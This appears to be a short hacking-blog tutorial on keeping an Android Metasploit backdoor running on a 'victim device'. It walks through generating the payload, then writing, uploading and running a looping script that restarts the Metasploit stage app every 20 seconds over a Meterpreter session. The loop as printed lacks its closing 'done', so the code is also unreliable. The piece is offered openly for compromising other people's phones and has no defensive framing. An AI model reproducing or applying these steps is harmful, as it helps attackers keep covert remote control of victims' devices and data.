

Latest Persistent Payload Script 2020 (100% Work)

Hello guys we come back with another exciting tutorial in which we going to teach you how to make your backdoor or payload persistent (Autostart) with a single bash script and it is the latest script. So excited let's get started.

First of All, we need to generate our payload for android using Metasploit - framework and I recommend you to use the Mob-Droid tool or script to done your work in an easy way.
Once you generated payload and successfully installed it in your victim device then you can go for making your backdoor or payload persistent using the given script.

while :
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
And save this file as Persistent.sh. I recommend you type this code manually if you don't want to become a script kiddie because I care about your knowledge. Now save this file and upload in the victim device using the given commands.

$ cd /sdcard

$ upload ' filepath'

Once the script uploaded to the victim device then go with these commands.

$ shell

$ cd /sdcard

$ sh Persistent.sh

Now, wait until the script successfully executes in terminal 2,3 times then close it by CTRL + x.  So finally it's done.

I hope this information is helpful for you if you found something interesting on our website then stay connected with us on other social media. If you still have any questions then feel free to comment below.

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